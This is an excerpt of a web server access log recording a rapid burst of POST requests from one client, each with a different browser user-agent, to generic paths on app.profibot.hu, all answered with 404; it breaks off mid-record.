"-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/admin" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/api/auth/session" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/product" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:01 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/app" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/users" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/search" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/shop" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/contact" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/account" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/account" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/account" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/blog" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/checkout" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:02 +0000] - 404 404 - POST https app.profibot.hu "/products" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/cart" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/post" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/user" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/users" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:46:03 +0000] - 404 404 - POST https app.profibot.hu "/home" [Client 213.209.159.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) 